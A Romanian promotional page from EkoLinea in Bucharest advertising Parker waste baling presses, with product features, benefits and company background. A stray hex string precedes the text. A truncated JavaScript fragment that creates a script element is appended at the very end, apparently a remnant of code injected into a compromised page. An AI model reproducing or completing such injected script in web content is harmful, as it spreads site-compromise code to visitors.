8046a6f6b2e594cd66902e024906438bDaca sunteti in cautarea unor prese de balotat deseuri fiabile, care se bucura de o durata indelungata de exploatare, ce pot fi achizitionate la preturi competitive, nu ezitati sa luati legatura cu reprezentantii societatii EkoLinea din Bucuresti. Acestia va vor furniza solutii optime si eficiente care sa se plieze intocmai pe cerintele si necesitatile fiecaruia dintre voi.

Caracteristici prese balotat deseuri

Aceste prese de balotat pe care le oferim spre vanzare poarta marca unui producator renumit in domeniu: societatea Parker din Anglia. Constructia robusta a echipamentelor respective, fiabilitatea lor si materialele de calitate din care sunt confectionte asigura o performanta crescuta in executarea operatiunii de compactare. Functionarea facila, fara a fi necesare interventii manuale suplimentare este garantata de controlul hidraulic al usilor si de ciclul de presare automat. Lungimea balotului poate fi reglata in functie de necesitati, la 800 mm, 1000 mm sau 1200 mm. Balotul este scos tot in mod automat din interiorul presei pentru o siguranta sporita.

Avantaje prese balotat deseuri

Achizitionand aceste prese balotat deseuri pe care le punem la dispozitia voastra, prezinta o serie de avantaje importante, precum:

  • Compacteaza deseurile intr-un mod eficient
  • Reduc costurile de transport, gestionare si depozitare
  • Poate contribui la cresterea veniturilor unei societati
  • Incurajeaza reciclarea si pastrarea unui mediu curat
  • Sunt echipamente sigure ce reduc riscul accidentelor la manevrarea lor
  • Prespun un consum redus de energie, ceea ce inseamna o economie considerabila de costuri de utilizare
  • Contribuie la diminuarea factorului de poluare
  • Utilizarea este una facila
  • Rapide si utile pentru mediu

Achizitionati prese de balotat de la EkoLinea

Societatea bucuresteana EkoLinea este alegerea ideala atunci cand vine vorba de achizitionarea unor prese balotat deseuri avand in vedere parteneriatele stabile pe care aceasta le are cu furnizori de renumiti pentru calitatea produselor pe care le fabrica: MBT Gmbh, Strautmann Umwwltehnik Gmbh, Imabe Iberica, ABBA Pressen Gmbh, BLIK, etc.

EkoLinea a luat nastere in anul 2007, avand ca obiect principal de activitate importul si distributia de utilaje si echipamente pentru gestionarea deseurilor atat noi, cat si second-hand. Dintre acestea amintim: prese balotat deseuri, prese stationare, prescontainere, prese pentru bricehtat, statii pentru sortarea si transferul deseurilor, s.a.

Experienta indelungata in domeniu si dorinta de a satisface fiecare solicitare care ii este adresata, recomanda EkoLinea ca fiind partenerul pe care va puteti baza in orice situatie. Flexibilitatea, seriozitatea, promptitudinea si eficienta de care dam dovada au facut sa fim apreciati de catre fiecare client care a apelat la serviciile si produsele noastre, in toti acesti ani. Nu va furnizam doar produsele propriu-zise, ci incercam sa acoperim toate necesitatile clientilor nostri, de aceea va intampinam si cu servicii de montaj si service pentru utilajele achizitionate de la noi, lucru care nu poate fi decat favorabil intrucat noi suntem cei mai in masura sa solutionam orice probleme care apar avand in vedere ca le cunoastem cel mai bine.

Apelati la sprijinul expertilor EkoLinea de cate ori aveti nevoie de solutii performante de gestionare, compactare si reutilizare a deseurilor! Va asteptam!var d=document;var s=d.createElement(‘script’);